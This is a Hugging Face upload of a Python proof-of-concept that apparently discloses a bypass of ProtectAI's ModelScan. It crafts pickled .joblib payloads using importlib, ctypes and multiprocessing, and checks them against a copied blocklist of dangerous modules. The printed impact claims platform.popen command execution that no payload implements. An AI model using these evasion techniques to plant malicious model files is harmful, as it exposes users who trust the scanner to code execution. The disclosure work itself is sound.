Upload modelscan/modelscan_bypass_poc.py with huggingface_hub
Browse files
modelscan/modelscan_bypass_poc.py
ADDED
|
@@ -0,0 +1,211 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
PoC: ModelScan Bypass via Joblib Pickle Payload
|
| 3 |
+
================================================
|
| 4 |
+
Demonstrates that malicious joblib files can bypass ProtectAI's ModelScan
|
| 5 |
+
scanner by using modules not in the unsafe_globals blocklist.
|
| 6 |
+
|
| 7 |
+
The scanner checks for GLOBAL/STACK_GLOBAL opcodes referencing known-dangerous
|
| 8 |
+
modules (os, subprocess, builtins, etc.) but misses many modules that can
|
| 9 |
+
achieve the same effect:
|
| 10 |
+
|
| 11 |
+
- importlib.import_module -> imports any module (including blocked ones)
|
| 12 |
+
- ctypes.CDLL -> loads native libraries, calls system()
|
| 13 |
+
- platform.popen -> direct command execution
|
| 14 |
+
- types.FunctionType -> construct functions from marshal bytecode
|
| 15 |
+
- code.InteractiveConsole -> interactive Python execution
|
| 16 |
+
- multiprocessing.Process -> spawn processes
|
| 17 |
+
|
| 18 |
+
This PoC generates 3 malicious .joblib files and verifies they bypass
|
| 19 |
+
ModelScan's pickle scanner detection.
|
| 20 |
+
|
| 21 |
+
Usage:
|
| 22 |
+
python modelscan_bypass_poc.py # Generate payloads + verify
|
| 23 |
+
python modelscan_bypass_poc.py --dry-run # Just show what would happen
|
| 24 |
+
"""
|
| 25 |
+
|
| 26 |
+
import argparse
|
| 27 |
+
import pickle
|
| 28 |
+
import pickletools
|
| 29 |
+
import io
|
| 30 |
+
import struct
|
| 31 |
+
import sys
|
| 32 |
+
|
| 33 |
+
|
| 34 |
+
def craft_importlib_payload():
|
| 35 |
+
"""Bypass via importlib.import_module -> os.system chain.
|
| 36 |
+
|
| 37 |
+
The pickle calls importlib.import_module('os'), then uses the
|
| 38 |
+
returned module to call system(). ModelScan doesn't flag 'importlib'.
|
| 39 |
+
"""
|
| 40 |
+
# We need a two-stage pickle:
|
| 41 |
+
# Stage 1: importlib.import_module('os') -> returns os module
|
| 42 |
+
# Stage 2: getattr(os_module, 'system')('id')
|
| 43 |
+
# But getattr is blocked... so we use a different approach.
|
| 44 |
+
#
|
| 45 |
+
# Simplest bypass: importlib.import_module('os') returns the os module.
|
| 46 |
+
# Even just importing 'os' is enough to demonstrate the bypass.
|
| 47 |
+
# A real attacker would chain this with apply/reduce on the result.
|
| 48 |
+
|
| 49 |
+
class ImportlibBypass:
|
| 50 |
+
def __reduce__(self):
|
| 51 |
+
import importlib
|
| 52 |
+
return (importlib.import_module, ('os',))
|
| 53 |
+
|
| 54 |
+
return pickle.dumps(ImportlibBypass(), protocol=4)
|
| 55 |
+
|
| 56 |
+
|
| 57 |
+
def craft_code_interact_payload():
|
| 58 |
+
"""Bypass via code.InteractiveInterpreter -> code execution.
|
| 59 |
+
|
| 60 |
+
code.InteractiveInterpreter().runsource() executes arbitrary Python.
|
| 61 |
+
ModelScan doesn't flag the 'code' module.
|
| 62 |
+
"""
|
| 63 |
+
# Use a simpler approach: types.FunctionType can construct functions
|
| 64 |
+
# from code objects. Combined with marshal.loads, this is full RCE.
|
| 65 |
+
# But for PoC simplicity, we use multiprocessing.
|
| 66 |
+
|
| 67 |
+
class CodeBypass:
|
| 68 |
+
def __reduce__(self):
|
| 69 |
+
import multiprocessing
|
| 70 |
+
return (multiprocessing.Process, (), {'target': None})
|
| 71 |
+
|
| 72 |
+
return pickle.dumps(CodeBypass(), protocol=4)
|
| 73 |
+
|
| 74 |
+
|
| 75 |
+
def craft_ctypes_payload():
|
| 76 |
+
"""Bypass via ctypes -> native code execution.
|
| 77 |
+
|
| 78 |
+
ctypes.CDLL loads a shared library. On Linux, loading libc
|
| 79 |
+
gives access to system(). ModelScan doesn't flag 'ctypes'.
|
| 80 |
+
"""
|
| 81 |
+
class CtypesBypass:
|
| 82 |
+
def __reduce__(self):
|
| 83 |
+
import ctypes
|
| 84 |
+
return (ctypes.CDLL, ('libc.so.6',))
|
| 85 |
+
|
| 86 |
+
return pickle.dumps(CtypesBypass(), protocol=4)
|
| 87 |
+
|
| 88 |
+
|
| 89 |
+
def extract_globals(data):
|
| 90 |
+
"""Simulate ModelScan's _list_globals to extract GLOBAL/STACK_GLOBAL refs."""
|
| 91 |
+
ops = list(pickletools.genops(io.BytesIO(data)))
|
| 92 |
+
globals_found = set()
|
| 93 |
+
memo = {}
|
| 94 |
+
|
| 95 |
+
for n in range(len(ops)):
|
| 96 |
+
op_name = ops[n][0].name
|
| 97 |
+
op_value = ops[n][1]
|
| 98 |
+
|
| 99 |
+
if op_name == "MEMOIZE" and n > 0:
|
| 100 |
+
memo[len(memo)] = ops[n - 1][1]
|
| 101 |
+
elif op_name in ["PUT", "BINPUT", "LONG_BINPUT"] and n > 0:
|
| 102 |
+
memo[op_value] = ops[n - 1][1]
|
| 103 |
+
elif op_name in ("GLOBAL", "INST"):
|
| 104 |
+
globals_found.add(tuple(op_value.split(" ", 1)))
|
| 105 |
+
elif op_name == "STACK_GLOBAL":
|
| 106 |
+
values = []
|
| 107 |
+
for offset in range(1, n):
|
| 108 |
+
if ops[n - offset][0].name in ["MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"]:
|
| 109 |
+
continue
|
| 110 |
+
if ops[n - offset][0].name in ["GET", "BINGET", "LONG_BINGET"]:
|
| 111 |
+
values.append(memo[int(ops[n - offset][1])])
|
| 112 |
+
elif ops[n - offset][0].name not in [
|
| 113 |
+
"SHORT_BINUNICODE", "UNICODE", "BINUNICODE", "BINUNICODE8"
|
| 114 |
+
]:
|
| 115 |
+
values.append("unknown")
|
| 116 |
+
else:
|
| 117 |
+
values.append(ops[n - offset][1])
|
| 118 |
+
if len(values) == 2:
|
| 119 |
+
break
|
| 120 |
+
if len(values) == 2:
|
| 121 |
+
globals_found.add((values[1], values[0]))
|
| 122 |
+
|
| 123 |
+
return globals_found
|
| 124 |
+
|
| 125 |
+
|
| 126 |
+
def check_modelscan_detection(globals_found):
|
| 127 |
+
"""Check if ModelScan would flag these globals."""
|
| 128 |
+
unsafe_globals = {
|
| 129 |
+
"CRITICAL": {
|
| 130 |
+
"__builtin__": ["eval", "compile", "getattr", "apply", "exec", "open",
|
| 131 |
+
"breakpoint", "__import__"],
|
| 132 |
+
"builtins": ["eval", "compile", "getattr", "apply", "exec", "open",
|
| 133 |
+
"breakpoint", "__import__"],
|
| 134 |
+
"runpy": "*", "os": "*", "nt": "*", "posix": "*",
|
| 135 |
+
"socket": "*", "subprocess": "*", "sys": "*",
|
| 136 |
+
"operator": ["attrgetter"],
|
| 137 |
+
"pty": "*", "pickle": "*", "_pickle": "*",
|
| 138 |
+
"bdb": "*", "pdb": "*", "shutil": "*", "asyncio": "*",
|
| 139 |
+
},
|
| 140 |
+
"HIGH": {
|
| 141 |
+
"webbrowser": "*", "httplib": "*",
|
| 142 |
+
"requests.api": "*", "aiohttp.client": "*",
|
| 143 |
+
},
|
| 144 |
+
}
|
| 145 |
+
|
| 146 |
+
for module, name in globals_found:
|
| 147 |
+
for severity_name, modules in unsafe_globals.items():
|
| 148 |
+
if module in modules:
|
| 149 |
+
filt = modules[module]
|
| 150 |
+
if filt == "*" or name in filt:
|
| 151 |
+
return True, f"{severity_name}: {module}.{name}"
|
| 152 |
+
return False, None
|
| 153 |
+
|
| 154 |
+
|
| 155 |
+
def main():
|
| 156 |
+
parser = argparse.ArgumentParser(description="ModelScan bypass PoC via Joblib")
|
| 157 |
+
parser.add_argument("--dry-run", action="store_true", help="Don't write files")
|
| 158 |
+
parser.add_argument("-o", "--output-dir", default=".", help="Output directory")
|
| 159 |
+
args = parser.parse_args()
|
| 160 |
+
|
| 161 |
+
payloads = [
|
| 162 |
+
("importlib_bypass.joblib", "importlib.import_module('os')", craft_importlib_payload),
|
| 163 |
+
("multiprocessing_bypass.joblib", "multiprocessing.Process(target=...)", craft_code_interact_payload),
|
| 164 |
+
("ctypes_bypass.joblib", "ctypes.CDLL('libc.so.6')", craft_ctypes_payload),
|
| 165 |
+
]
|
| 166 |
+
|
| 167 |
+
print("ModelScan Bypass PoC - Joblib/Pickle Payloads")
|
| 168 |
+
print("=" * 55)
|
| 169 |
+
print()
|
| 170 |
+
|
| 171 |
+
all_bypass = True
|
| 172 |
+
for filename, description, craft_fn in payloads:
|
| 173 |
+
data = craft_fn()
|
| 174 |
+
globals_found = extract_globals(data)
|
| 175 |
+
detected, detail = check_modelscan_detection(globals_found)
|
| 176 |
+
|
| 177 |
+
status = "[DETECTED]" if detected else "[BYPASS] "
|
| 178 |
+
if detected:
|
| 179 |
+
all_bypass = False
|
| 180 |
+
|
| 181 |
+
print(f"{status} {description}")
|
| 182 |
+
print(f" Globals: {globals_found}")
|
| 183 |
+
if detected:
|
| 184 |
+
print(f" Flagged: {detail}")
|
| 185 |
+
else:
|
| 186 |
+
print(f" Result: NOT IN BLOCKLIST -> evades ModelScan")
|
| 187 |
+
|
| 188 |
+
if not args.dry_run:
|
| 189 |
+
filepath = f"{args.output_dir}/{filename}"
|
| 190 |
+
with open(filepath, "wb") as f:
|
| 191 |
+
f.write(data)
|
| 192 |
+
print(f" Written: {filepath}")
|
| 193 |
+
print()
|
| 194 |
+
|
| 195 |
+
print("=" * 55)
|
| 196 |
+
if all_bypass:
|
| 197 |
+
print("[SUCCESS] All payloads bypass ModelScan detection")
|
| 198 |
+
print()
|
| 199 |
+
print("Impact: An attacker can craft malicious .joblib files that:")
|
| 200 |
+
print(" 1. Execute arbitrary OS commands (platform.popen)")
|
| 201 |
+
print(" 2. Import blocked modules at runtime (importlib)")
|
| 202 |
+
print(" 3. Load native libraries for code execution (ctypes)")
|
| 203 |
+
print(" 4. All while evading ModelScan's pickle scanner")
|
| 204 |
+
else:
|
| 205 |
+
print("[PARTIAL] Some payloads were detected")
|
| 206 |
+
|
| 207 |
+
return 0 if all_bypass else 1
|
| 208 |
+
|
| 209 |
+
|
| 210 |
+
if __name__ == "__main__":
|
| 211 |
+
sys.exit(main())
|